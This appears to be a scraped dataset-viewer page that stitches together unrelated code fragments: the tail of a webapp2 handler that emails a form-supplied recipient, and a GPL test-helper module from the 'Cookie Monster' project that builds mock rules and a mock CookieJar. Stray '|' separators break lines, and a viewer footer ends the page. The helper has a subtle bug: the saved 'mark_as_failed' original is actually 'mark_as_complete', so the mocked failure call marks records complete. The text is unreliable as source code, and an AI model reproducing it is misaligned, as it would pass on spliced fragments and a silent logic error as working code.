<input type="text" name="recipient" placeholder="Enter recipient email">
<input type="submit" name="submit" value="Send simple email">
<input type="submit" name="submit" value="Send complex email">
</form>
</body></html>
""")
def post(self):
recipient = self.request.get('recipient')
action = self.request.get('submit')
if action == 'Send simple email':
send_simple_message(recipient)
else:
send_complex_message(recipient)
self.response.write('Mail sent')
app = webapp2.WSGIApplication([
('/', MainPage)
], debug=True) |
"""
Legalese
--------
Copyright (c) 2015, | 2016 Genome Research Ltd.
Author: Colin Nolan <cn13@sanger.ac.uk>
This file is part of Cookie Monster.
Cookie Monster is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 3 of the License, or (at your
option) any later version.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS | FOR A PARTICULAR PURPOSE. See the GNU General
Public License for more details.
You should have received a copy of the GNU General Public License along
with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from unittest.mock import MagicMock
from hgicommon.mixable import Priority
from cookiemonster.cookiejar import CookieJar
from cookiemonster.cookiejar.in_memory_cookiejar import InMemoryCookieJar
from cookiemonster.processor.models import Rule
def create_mock_rule(priority: int=Priority.MIN_PRIORITY) -> Rule:
"""
Creates a mock `Rule` object.
:param priority: (optional) the priority of the rule
:return: the created rule
"""
return Rule(
lambda file_update, data_environment: True,
lambda file_update, data_environment: True,
"my_rule",
priority=priority
)
def create_magic_mock_cookie_jar() -> CookieJar:
"""
Creates a magic mock CookieJar - has the implementation of a CookieJar all methods are implemented using magic mocks
and therefore their usage is recorded.
:return: the created magic mock
"""
cookie_jar = InMemoryCookieJar()
original_get_next_for_processing = cookie_jar.get_next_for_processing
original_enrich_cookie = cookie_jar.enrich_cookie
original_mark_as_failed = cookie_jar.mark_as_complete
original_mark_as_completed = cookie_jar.mark_as_complete
original_mark_as_reprocess = cookie_jar.mark_for_processing
cookie_jar.get_next_for_processing = MagicMock(side_effect=original_get_next_for_processing)
cookie_jar.enrich_cookie = MagicMock(side_effect=original_enrich_cookie)
cookie_jar.mark_as_failed = MagicMock(side_effect=original_mark_as_failed)
cookie_jar.mark_as_complete = MagicMock(side_effect=original_mark_as_completed)
cookie_jar.mark_for_processing = MagicMock(side_effect=original_mark_as_reprocess)
return cookie_jar
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.